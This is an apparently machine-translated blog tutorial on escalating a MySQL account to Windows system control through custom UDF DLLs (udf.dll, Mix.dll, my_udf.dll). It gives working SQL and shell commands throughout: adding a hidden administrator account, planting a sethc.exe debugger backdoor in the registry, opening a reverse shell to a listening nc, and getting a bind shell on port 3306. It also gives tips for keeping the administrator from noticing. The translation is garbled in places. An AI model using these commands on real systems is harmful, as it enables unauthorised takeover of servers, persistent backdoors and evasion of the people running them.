About udf and mix Elevation of Privilege

I. Functions: Use the custom functions of MYSQL (I declare again that using MYSQL UDF to escalate permissions is not an overflow, but a function of MYSQL itself ), converts a MYSQL account to a system permission. II. Application scenarios: 1. the target system is Windows (Win2000, XP, Win2003); 2. you already have a user account of MYSQL. This account must have the insert and delete permissions on mysql to create and discard functions (MYSQL document primitives ).

Iii. Help:
Step 1: Upload the PHP file to the target machine and enter your MYSQL account to connect.

Step 2: After the connection is successful, export the DLL file. Do not pay attention to the export path during export (generally any directory can be written without permission concerns). For MySQL or later versions, you must export the DLL to the system directory (win or system32) of the target machine. Otherwise, you will see the "No paths allowed for shared library" error in the next step.

Step 3: use SQL statements to create functions. Syntax: Create Function Name (the Function name can only be one of the following lists) returns string soname 'export DLL path'; For Versions later than MYSQL5.0, the DLL in the statement does not allow full paths. If you have exported the DLL to the system directory in step 2, you can omit the path and run the command normally, otherwise, you will see the "Can't open shared library" error. In this case, you must re-export the DLL to the system directory.

 

Step 4: After correctly creating function functions, you can use these functions using SQL statements. Syntax: the name of the function created by the select statement ('parameter list'). Each function has different parameters. You can use the name of the function created by the select statement ('help '); to obtain the parameter list of the specified function.

Iv. Function Description:
Cmdshell executes cmd;
Downloader downloads the specified file online and saves it to the specified directory;
Open3389 General Open 3389 terminal service, you can specify the port (no need to restart without changing the port );
Backshell rebound Shell;
ProcessView: Lists system processes;
KillProcess: terminates a specified process;
Regread read the registry;
Regwrite write the registry;
Shut down shut, log off, and restart;
About description and help functions;

Write the registry function.
Select regwrite ("HKEY_LOCAL_MACHINE", "SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ sethc.exe", "Debugger", "REG_SZ ", "E: \ web \ 170stock \ admin \ include \ assumer.exe ");

 

C: \ Winnt \ udf. dll 2000
C: \ Windows \ udfs. dll 2003
Now, basically the Windows Server exports the UDF. DLL
Create function example shell returns string soname 'udf. dll'
Select export shell ('net user admins 226404553/add ');
Select foreign shell ('net localgroup administrators admins/add ');
Select export shell ('C: \ 3389.exe ');
Drop function using shell; delete function
Select foreign shell ('netstat-any ');

Iii. Mix. dll Elevation of Privilege
After WEBSHELL is obtained, it is not difficult to find the user and password. Now I use another machine as an example. I have uploaded PHPSHELL. Generally, the account and password for connecting to MYSQL are very easy to find. I can edit a PHP file and see it.
Now, what should I do if I have the username: root Password: 123456 Database Name: php? Use SQL Query to establish a connection. The connection is successful. Now we can use the following command to escalate the permission: Mix. dll My_udf.dll Upload first. OK, transfer it, Mix. dll is used to rebound the connection. My_udf.dll is a forward connection. You can directly connect to port 3306 of the other party and enter the password to obtain the mongoshell. Well, let's not talk about it. After it is uploaded, execute the following SQL statement create function Mixconnect returns string soname 'd: \ php \ Mix. dll '; to register the function.

The SQL statement is successfully executed!

It's not far from getting mongoshell. First, we first use NC to listen to a port locally. First, Nc-l-p 1234 (I don't think so) and then execute the statement: select Mixconnect ('2017. 168.1.254 ', '123'); to activate the function, execute the function successfully, and check whether the NC reflects it. The CMSHELL is successfully obtained. However, the MYSQL of the other party is suspended, we need to kill the MYSQL service process and restart the MYSQL service. Otherwise, the Administrator will find that the website cannot run .... If the server is not allowed to connect to any external IP address and port, its port 3306 is opened externally! In this case, My_udf.dll should be on the stage. The method is the same as Mix. After successful connection to MYSQL, run the following statement: create function my_udfdoor returns string soname 'd: \ php \ my_udf.dll '; after the statement is successfully executed, we start to activate the function, input the statement: select my_udfdoor (''), connect to port 3306 with nc, and then enter fuck to get a mongoshell.

Elevation of Privilege (mix. dll Elevation of Privilege)

D:/usr/www/html/mix. dll mysql-h Destination ip-uroot-p \. c: \ mysql.txt select Mixconnect ('bounce ip', 'Port'); nc-vv-l-p 1983

 

From: mer4en7y's blog